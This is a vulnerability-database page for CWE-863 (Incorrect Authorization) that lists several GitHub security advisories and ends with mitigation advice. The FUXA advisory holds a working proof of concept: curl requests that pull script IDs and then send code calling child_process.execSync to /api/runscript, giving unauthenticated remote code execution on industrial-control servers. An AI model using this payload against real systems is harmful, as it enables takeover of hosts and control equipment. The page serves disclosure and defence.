Common Weakness Enumeration

CWE-863

Allowed-with-Review

Incorrect Authorization

Abstraction: Class · Status: Incomplete

The product performs an authorization check when an actor attempts to access a resource or perform an action, but it does not correctly perform the check.

5559 vulnerabilities reference this CWE, most recent first.

GHSA-RG3M-CFQ7-G6H6

Vulnerability from github – Published: 2026-05-26 23:44 – Updated: 2026-05-26 23:44
VLAI
Summary
FUXA Vulnerable to Unauthenticated Remote Code Execution via Script Test Mode Authorization Bypass
Details

Summary

An unauthenticated Remote Code Execution vulnerability exists in FUXA when secureEnabled is set to true. The POST /api/runscript endpoint checks authorization against the stored script's permission by ID, but when test: true is set in the request, it compiles and executes attacker-supplied code instead of the stored script's code. An unauthenticated attacker who knows a valid script ID and name may execute arbitrary code via test mode if at least one server-side script exists and is accessible without restrictive permissions.

Script IDs and names can be obtained through the unauthenticated information disclosure in GET /api/project (reported separately).

The only prerequisite is that at least one server-side script exists in the project.

Details

Authorization confused deputy in script execution

File: server/runtime/scripts/index.js, lines 86-103

The authorization check looks up the stored script by ID and validates the stored script's permission field:

this.isAuthorised = function (_script, permission) {
    const st = scriptModule.getScript(_script);  // finds stored script by _script.id
    if (admin || (st && (!st.permission || st.permission & permission))) {
        return true;
    }
    return false;
}

When a script has no permission field set (or permission: 0), the expression !st.permission evaluates to true, and the check passes for any caller including guests.

Guest auto-authentication in the middleware

File: server/api/jwt-helper.js, lines 46-72

The verifyToken middleware generates a valid guest JWT when no token is provided:

if (!token) {
    token = getGuestToken();
}

The guest token passes verification. The request proceeds to the handler with userId: "guest". The isAuthorised check then finds the stored script and validates against its permission. Scripts without a permission field pass for any user including guests.

Test mode executes attacker-supplied code

File: server/runtime/scripts/msm.js

When test: true is set, runTestScript takes the attacker's code field from the request body, compiles it into a Node.js module via Module._compile, and executes it with full access to require, child_process, fs, and the entire Node.js runtime. The authorization checked the stored script's permission. The execution runs the attacker's code.

PoC

Requires an existing server-side script accessible without restrictive permissions.

Step 1: Retrieve script IDs from the unauthenticated project endpoint

curl -s http://192.168.32.129:1881/api/project | jq '.scripts[] | {id, name, permission}'
{
  "id": "legit-001",
  "name": "calculate",
}
{
  "id": "s_42a888fa-8e3d4213",
  "name": "subs",
}

Step 2: Execute whoami without authentication

Using the script ID and name from step 1:

curl -s -X POST http://192.168.32.129:1881/api/runscript \
  -H "Content-Type: application/json" \
  -d '{"params":{"script":{"id":"s_42a888fa-8e3d4213","name":"subs","test":true,"code":"return require(\"child_process\").execSync(\"whoami\").toString()","parameters":[],"sync":true}}}'

Impact

Any network-reachable attacker can achieve Remote Code Execution on the FUXA server without any credentials. The attacker needs a valid script ID and name (obtainable through the separately reported information disclosure) and one server-side script to exist in the project.

Potential impact includes arbitrary command execution on the host, access to configured device connections and credentials, and compromise of industrial control functionality managed by the FUXA instance.

This issue depends on the presence of an existing server-side script with no restrictive permissions configured. It does not affect configurations without server-side scripts or where script permissions prevent guest access.

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "npm",
        "name": "fuxa-server"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "1.3.0"
            },
            {
              "fixed": "1.3.1"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ],
      "versions": [
        "1.3.0"
      ]
    }
  ],
  "aliases": [
    "CVE-2026-43947"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-863"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-05-26T23:44:52Z",
    "nvd_published_at": null,
    "severity": "HIGH"
  },
  "details": "### Summary\n\nAn unauthenticated Remote Code Execution vulnerability exists in FUXA when `secureEnabled` is set to `true`. The `POST /api/runscript` endpoint checks authorization against the stored script\u0027s permission by ID, but when `test: true` is set in the request, it compiles and executes attacker-supplied code instead of the stored script\u0027s code. An unauthenticated attacker who knows a valid script ID and name may execute arbitrary code via test mode if at least one server-side script exists and is accessible without restrictive permissions.\n\nScript IDs and names can be obtained through the unauthenticated information disclosure in `GET /api/project` (reported separately).\n\nThe only prerequisite is that at least one server-side script exists in the project.\n\n### Details\n\n**Authorization confused deputy in script execution**\n\nFile: `server/runtime/scripts/index.js`, lines 86-103\n\nThe authorization check looks up the stored script by ID and validates the stored script\u0027s `permission` field:\n\n```javascript\nthis.isAuthorised = function (_script, permission) {\n    const st = scriptModule.getScript(_script);  // finds stored script by _script.id\n    if (admin || (st \u0026\u0026 (!st.permission || st.permission \u0026 permission))) {\n        return true;\n    }\n    return false;\n}\n```\n\nWhen a script has no `permission` field set (or `permission: 0`), the expression `!st.permission` evaluates to `true`, and the check passes for any caller including guests.\n\n**Guest auto-authentication in the middleware**\n\nFile: `server/api/jwt-helper.js`, lines 46-72\n\nThe `verifyToken` middleware generates a valid guest JWT when no token is provided:\n\n```javascript\nif (!token) {\n    token = getGuestToken();\n}\n```\n\nThe guest token passes verification. The request proceeds to the handler with `userId: \"guest\"`. The `isAuthorised` check then finds the stored script and validates against its permission. Scripts without a `permission` field pass for any user including guests.\n\n**Test mode executes attacker-supplied code**\n\nFile: `server/runtime/scripts/msm.js`\n\nWhen `test: true` is set, `runTestScript` takes the attacker\u0027s `code` field from the request body, compiles it into a Node.js module via `Module._compile`, and executes it with full access to `require`, `child_process`, `fs`, and the entire Node.js runtime. The authorization checked the stored script\u0027s permission. The execution runs the attacker\u0027s code.\n\n### PoC\n\nRequires an existing server-side script accessible without restrictive permissions.\n\n**Step 1: Retrieve script IDs from the unauthenticated project endpoint**\n\n```bash\ncurl -s http://192.168.32.129:1881/api/project | jq \u0027.scripts[] | {id, name, permission}\u0027\n```\n\n```json\n{\n  \"id\": \"legit-001\",\n  \"name\": \"calculate\",\n}\n{\n  \"id\": \"s_42a888fa-8e3d4213\",\n  \"name\": \"subs\",\n}\n```\n\n**Step 2: Execute `whoami` without authentication**\n\nUsing the script ID and name from step 1:\n\n```bash\ncurl -s -X POST http://192.168.32.129:1881/api/runscript \\\n  -H \"Content-Type: application/json\" \\\n  -d \u0027{\"params\":{\"script\":{\"id\":\"s_42a888fa-8e3d4213\",\"name\":\"subs\",\"test\":true,\"code\":\"return require(\\\"child_process\\\").execSync(\\\"whoami\\\").toString()\",\"parameters\":[],\"sync\":true}}}\u0027\n```\n\n\n### Impact\n\nAny network-reachable attacker can achieve Remote Code Execution on the FUXA server without any credentials. The attacker needs a valid script ID and name (obtainable through the separately reported information disclosure) and one server-side script to exist in the project.\n\nPotential impact includes arbitrary command execution on the host, access to configured device connections and credentials, and compromise of industrial control functionality managed by the FUXA instance.\n\nThis issue depends on the presence of an existing server-side script with no restrictive permissions configured. It does not affect configurations without server-side scripts or where script permissions prevent guest access.",
  "id": "GHSA-rg3m-cfq7-g6h6",
  "modified": "2026-05-26T23:44:52Z",
  "published": "2026-05-26T23:44:52Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/frangoteam/FUXA/security/advisories/GHSA-rg3m-cfq7-g6h6"
    },
    {
      "type": "WEB",
      "url": "https://github.com/frangoteam/FUXA/pull/2260"
    },
    {
      "type": "WEB",
      "url": "https://github.com/frangoteam/FUXA/commit/78534da61a91613712b44bb63c8d7da8c5df5ca4"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/frangoteam/FUXA"
    },
    {
      "type": "WEB",
      "url": "https://github.com/frangoteam/FUXA/releases/tag/v1.3.1"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P",
      "type": "CVSS_V4"
    }
  ],
  "summary": "FUXA Vulnerable to Unauthenticated Remote Code Execution via Script Test Mode Authorization Bypass"
}

GHSA-RG52-XRWC-XM79

Vulnerability from github – Published: 2023-07-13 15:30 – Updated: 2024-04-04 06:07
VLAI
Details

Sourcecodester Online Computer and Laptop Store 1.0 is vulnerable to Incorrect Access Control, which allows remote attackers to elevate privileges to the administrator's role.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2023-31704"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-863"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2023-07-13T15:15:08Z",
    "severity": "CRITICAL"
  },
  "details": "Sourcecodester Online Computer and Laptop Store 1.0 is vulnerable to Incorrect Access Control, which allows remote attackers to elevate privileges to the administrator\u0027s role.",
  "id": "GHSA-rg52-xrwc-xm79",
  "modified": "2024-04-04T06:07:21Z",
  "published": "2023-07-13T15:30:19Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-31704"
    },
    {
      "type": "WEB",
      "url": "https://github.com/d34dun1c02n/CVE-2023-31704"
    },
    {
      "type": "WEB",
      "url": "https://www.sourcecodester.com/php/16397/online-computer-and-laptop-store-using-php-and-mysql-source-code-free-download.html"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-RG57-W2FR-7HGM

Vulnerability from github – Published: 2024-07-17 00:32 – Updated: 2024-07-17 00:32
VLAI
Details

Vulnerability in the Oracle Enterprise Asset Management product of Oracle E-Business Suite (component: Work Definition Issues). Supported versions that are affected are 12.2.11-12.2.13. Easily exploitable vulnerability allows low privileged attacker with network access via HTTP to compromise Oracle Enterprise Asset Management. Successful attacks of this vulnerability can result in unauthorized creation, deletion or modification access to critical data or all Oracle Enterprise Asset Management accessible data as well as unauthorized access to critical data or complete access to all Oracle Enterprise Asset Management accessible data. CVSS 3.1 Base Score 8.1 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N).

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2024-21149"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-863"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2024-07-16T23:15:16Z",
    "severity": "HIGH"
  },
  "details": "Vulnerability in the Oracle Enterprise Asset Management product of Oracle E-Business Suite (component: Work Definition Issues).  Supported versions that are affected are 12.2.11-12.2.13. Easily exploitable vulnerability allows low privileged attacker with network access via HTTP to compromise Oracle Enterprise Asset Management.  Successful attacks of this vulnerability can result in  unauthorized creation, deletion or modification access to critical data or all Oracle Enterprise Asset Management accessible data as well as  unauthorized access to critical data or complete access to all Oracle Enterprise Asset Management accessible data. CVSS 3.1 Base Score 8.1 (Confidentiality and Integrity impacts).  CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N).",
  "id": "GHSA-rg57-w2fr-7hgm",
  "modified": "2024-07-17T00:32:55Z",
  "published": "2024-07-17T00:32:55Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-21149"
    },
    {
      "type": "WEB",
      "url": "https://www.oracle.com/security-alerts/cpujul2024.html"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-RG65-7HJC-5CW2

Vulnerability from github – Published: 2024-10-25 18:30 – Updated: 2024-10-29 21:30
VLAI
Details

OvalEdge 5.2.8.0 and earlier is affected by an Account Takeover vulnerability via a POST request to /user/updatePassword via the userId and newPsw parameters. Authentication is required.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2022-30358"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-863"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2024-10-25T17:15:03Z",
    "severity": "HIGH"
  },
  "details": "OvalEdge 5.2.8.0 and earlier is affected by an Account Takeover vulnerability via a POST request to /user/updatePassword via the userId and newPsw parameters. Authentication is required.",
  "id": "GHSA-rg65-7hjc-5cw2",
  "modified": "2024-10-29T21:30:48Z",
  "published": "2024-10-25T18:30:49Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-30358"
    },
    {
      "type": "WEB",
      "url": "https://cve.offsecguy.com/ovaledge/vulnerabilities/account-takeover#cve-2022-30358"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-RG8M-3943-VM6Q

Vulnerability from github – Published: 2026-04-02 21:00 – Updated: 2026-05-06 22:23
VLAI
Summary
OpenClaw: Matrix thread root and reply context bypass sender allowlist
Details

Summary

Matrix thread root and reply context bypass sender allowlist

Current Maintainer Triage

  • Status: open
  • Normalized severity: medium
  • Assessment: Real in shipped v2026.3.28 Matrix because fetched thread-root/reply context bypasses sender allowlists, with unreleased mainline filtering fix.

Affected Packages / Versions

  • Package: openclaw (npm)
  • Latest published npm version: 2026.3.31
  • Vulnerable version range: <=2026.3.28
  • Patched versions: >= 2026.3.31
  • First stable tag containing the fix: v2026.3.31

Fix Commit(s)

  • 8a563d603b70ef6338915f0527bee87282c3bad5 — 2026-03-31T17:09:03+01:00

OpenClaw thanks @AntAISecurityLab for reporting.

Show details on source website

{
  "affected": [
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c= 2026.3.28"
      },
      "package": {
        "ecosystem": "npm",
        "name": "openclaw"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "2026.3.31"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-41376"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-346",
      "CWE-863"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-04-02T21:00:44Z",
    "nvd_published_at": "2026-04-28T19:37:40Z",
    "severity": "LOW"
  },
  "details": "## Summary\nMatrix thread root and reply context bypass sender allowlist\n\n## Current Maintainer Triage\n- Status: open\n- Normalized severity: medium\n- Assessment: Real in shipped v2026.3.28 Matrix because fetched thread-root/reply context bypasses sender allowlists, with unreleased mainline filtering fix.\n\n## Affected Packages / Versions\n- Package: `openclaw` (npm)\n- Latest published npm version: `2026.3.31`\n- Vulnerable version range: `\u003c=2026.3.28`\n- Patched versions: `\u003e= 2026.3.31`\n- First stable tag containing the fix: `v2026.3.31`\n\n## Fix Commit(s)\n- `8a563d603b70ef6338915f0527bee87282c3bad5` \u2014 2026-03-31T17:09:03+01:00\n\nOpenClaw thanks @AntAISecurityLab for reporting.",
  "id": "GHSA-rg8m-3943-vm6q",
  "modified": "2026-05-06T22:23:18Z",
  "published": "2026-04-02T21:00:44Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-rg8m-3943-vm6q"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-41376"
    },
    {
      "type": "WEB",
      "url": "https://github.com/openclaw/openclaw/commit/8a563d603b70ef6338915f0527bee87282c3bad5"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/openclaw/openclaw"
    },
    {
      "type": "WEB",
      "url": "https://github.com/openclaw/openclaw/releases/tag/v2026.3.31"
    },
    {
      "type": "WEB",
      "url": "https://www.vulncheck.com/advisories/openclaw-matrix-thread-context-allowlist-bypass-via-sender-validation"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N",
      "type": "CVSS_V3"
    },
    {
      "score": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N",
      "type": "CVSS_V4"
    }
  ],
  "summary": "OpenClaw: Matrix thread root and reply context bypass sender allowlist"
}

GHSA-RG8M-84JF-9367

Vulnerability from github – Published: 2022-05-24 17:17 – Updated: 2024-04-24 20:24
VLAI
Summary
Incorrect Authorization in Dolibarr
Details

core/get_menudiv.php in Dolibarr before 11.0.4 allows remote authenticated attackers to bypass intended access restrictions via a non-alphanumeric menu parameter.

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "Packagist",
        "name": "dolibarr/dolibarr"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "12.0.0"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2020-12669"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-863"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2024-04-24T20:24:02Z",
    "nvd_published_at": "2020-05-06T19:15:00Z",
    "severity": "HIGH"
  },
  "details": "core/get_menudiv.php in Dolibarr before 11.0.4 allows remote authenticated attackers to bypass intended access restrictions via a non-alphanumeric menu parameter.",
  "id": "GHSA-rg8m-84jf-9367",
  "modified": "2024-04-24T20:24:15Z",
  "published": "2022-05-24T17:17:16Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-12669"
    },
    {
      "type": "WEB",
      "url": "https://github.com/Dolibarr/dolibarr/commit/c1b530f58f6f01081ddbeaa2092ef308c3ec2727"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/Dolibarr/dolibarr"
    },
    {
      "type": "WEB",
      "url": "https://sourceforge.net/projects/dolibarr/files/Dolibarr%20ERP-CRM/11.0.4"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Incorrect Authorization in Dolibarr "
}

GHSA-RG9V-8HP2-6Q4G

Vulnerability from github – Published: 2024-10-14 18:30 – Updated: 2024-10-15 18:30
VLAI
Details

An issue in Hideez com.hideez 2.7.8.3 allows a remote attacker to obtain sensitive information via the firmware update process.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2024-48792"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-863"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2024-10-14T18:15:05Z",
    "severity": "HIGH"
  },
  "details": "An issue in Hideez com.hideez 2.7.8.3 allows a remote attacker to obtain sensitive information via the firmware update process.",
  "id": "GHSA-rg9v-8hp2-6q4g",
  "modified": "2024-10-15T18:30:49Z",
  "published": "2024-10-14T18:30:26Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-48792"
    },
    {
      "type": "WEB",
      "url": "https://github.com/HankJames/Vul-Reports/blob/main/FirmwareLeakage/com.hideez/com.hideez.md"
    },
    {
      "type": "WEB",
      "url": "https://hideez.com/en-int"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-RGCF-V2QH-FW5R

Vulnerability from github – Published: 2022-05-24 17:17 – Updated: 2022-05-24 17:17
VLAI
Details

vBulletin before 5.5.6pl1, 5.6.0 before 5.6.0pl1, and 5.6.1 before 5.6.1pl1 has incorrect access control.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2020-12720"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-863",
      "CWE-89"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2020-05-08T00:15:00Z",
    "severity": "HIGH"
  },
  "details": "vBulletin before 5.5.6pl1, 5.6.0 before 5.6.0pl1, and 5.6.1 before 5.6.1pl1 has incorrect access control.",
  "id": "GHSA-rgcf-v2qh-fw5r",
  "modified": "2022-05-24T17:17:30Z",
  "published": "2022-05-24T17:17:30Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-12720"
    },
    {
      "type": "WEB",
      "url": "https://attackerkb.com/topics/RSDAFLik92/cve-2020-12720-vbulletin-incorrect-access-control"
    },
    {
      "type": "WEB",
      "url": "https://forum.vbulletin.com/forum/vbulletin-announcements/vbulletin-announcements_aa/4440032-vbulletin-5-6-1-security-patch-level-1"
    },
    {
      "type": "WEB",
      "url": "http://packetstormsecurity.com/files/157716/vBulletin-5.6.1-SQL-Injection.html"
    },
    {
      "type": "WEB",
      "url": "http://packetstormsecurity.com/files/157904/vBulletin-5.6.1-SQL-Injection.html"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-RGGC-M335-3WVJ

Vulnerability from github – Published: 2026-07-02 16:03 – Updated: 2026-07-02 16:03
VLAI
Summary
OpenClaw: Same-host trusted-proxy deployments could accept local forged identity headers
Details

Summary

Same-host trusted-proxy deployments could accept local forged identity headers. In affected versions, a local same-host caller that can reach the proxy-facing Gateway port could supply identity headers normally reserved for the trusted proxy.

This advisory is scoped to the named feature and configuration. It does not change OpenClaw's trusted-operator model: authenticated Gateway operators, installed plugins, and intentional local execution surfaces remain trusted unless a separate policy, approval, allowlist, sandbox, or auth boundary is crossed.

Impact

When the affected feature is enabled and reachable, this could receive operator identity associated with the forged headers. Practical impact depends on the operator's configuration and whether lower-trust input can reach that path.

Patched Versions

The first stable patched version is 2026.5.18.

Mitigations

bind trusted-proxy ingress behind the actual proxy and firewall direct same-host access. As general hardening, keep channel and tool allowlists narrow, avoid sharing one Gateway between mutually untrusted users, and disable the affected feature when it is not needed.

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "npm",
        "name": "openclaw"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "2026.5.18"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [],
  "database_specific": {
    "cwe_ids": [
      "CWE-269",
      "CWE-284",
      "CWE-287",
      "CWE-290",
      "CWE-863"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-07-02T16:03:10Z",
    "nvd_published_at": null,
    "severity": "HIGH"
  },
  "details": "### Summary\n\nSame-host trusted-proxy deployments could accept local forged identity headers. In affected versions, a local same-host caller that can reach the proxy-facing Gateway port could supply identity headers normally reserved for the trusted proxy.\n\nThis advisory is scoped to the named feature and configuration. It does not change OpenClaw\u0027s trusted-operator model: authenticated Gateway operators, installed plugins, and intentional local execution surfaces remain trusted unless a separate policy, approval, allowlist, sandbox, or auth boundary is crossed.\n\n### Impact\n\nWhen the affected feature is enabled and reachable, this could receive operator identity associated with the forged headers. Practical impact depends on the operator\u0027s configuration and whether lower-trust input can reach that path.\n\n### Patched Versions\n\nThe first stable patched version is `2026.5.18`.\n\n### Mitigations\n\nbind trusted-proxy ingress behind the actual proxy and firewall direct same-host access. As general hardening, keep channel and tool allowlists narrow, avoid sharing one Gateway between mutually untrusted users, and disable the affected feature when it is not needed.",
  "id": "GHSA-rggc-m335-3wvj",
  "modified": "2026-07-02T16:03:10Z",
  "published": "2026-07-02T16:03:10Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-rggc-m335-3wvj"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/openclaw/openclaw"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N",
      "type": "CVSS_V4"
    }
  ],
  "summary": "OpenClaw: Same-host trusted-proxy deployments could accept local forged identity headers"
}

GHSA-RGGW-5H76-8V9H

Vulnerability from github – Published: 2022-05-24 19:17 – Updated: 2022-07-13 00:01
VLAI
Details

The ReplaceText extension through 1.41 for MediaWiki has Incorrect Access Control. When a user is blocked after submitting a replace job, the job is still run, even if it may be run at a later time (due to the job queue backlog)

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2021-41801"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-863"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2021-10-11T08:15:00Z",
    "severity": "HIGH"
  },
  "details": "The ReplaceText extension through 1.41 for MediaWiki has Incorrect Access Control. When a user is blocked after submitting a replace job, the job is still run, even if it may be run at a later time (due to the job queue backlog)",
  "id": "GHSA-rggw-5h76-8v9h",
  "modified": "2022-07-13T00:01:41Z",
  "published": "2022-05-24T19:17:14Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-41801"
    },
    {
      "type": "WEB",
      "url": "https://lists.wikimedia.org/hyperkitty/list/wikitech-l@lists.wikimedia.org/thread/2IFS5CM2YV4VMSODPX3J2LFHKSEWVFV5"
    },
    {
      "type": "WEB",
      "url": "https://phabricator.wikimedia.org/T279090"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ]
}

Mitigation
Architecture and Design
  • Divide the product into anonymous, normal, privileged, and administrative areas. Reduce the attack surface by carefully mapping roles with data and functionality. Use role-based access control (RBAC) [REF-229] to enforce the roles at the appropriate boundaries.
  • Note that this approach may not protect against horizontal authorization, i.e., it will not protect a user from attacking others with the same role.
Mitigation
Architecture and Design

Ensure that access control checks are performed related to the business logic. These checks may be different than the access control checks that are applied to more generic resources such as files, connections, processes, memory, and database records. For example, a database may restrict access for medical records to a specific database user, but each record might only be intended to be accessible to the patient and the patient's doctor [REF-7].

Mitigation MIT-4.4
Architecture and Design

Strategy: Libraries or Frameworks

  • Use a vetted library or framework that does not allow this weakness to occur or provides constructs that make this weakness easier to avoid.
  • For example, consider using authorization frameworks such as the JAAS Authorization Framework [REF-233] and the OWASP ESAPI Access Control feature [REF-45].
Mitigation
Architecture and Design
  • For web applications, make sure that the access control mechanism is enforced correctly at the server side on every page. Users should not be able to access any unauthorized functionality or information by simply requesting direct access to that page.
  • One way to do this is to ensure that all pages containing sensitive information are not cached, and that all such pages restrict access to requests that are accompanied by an active and authenticated session token associated with a user who has the required permissions to access that page.
Mitigation
System Configuration Installation

Use the access control capabilities of your operating system and server environment and define your access control lists accordingly. Use a "default deny" policy when defining these ACLs.

No CAPEC attack patterns related to this CWE.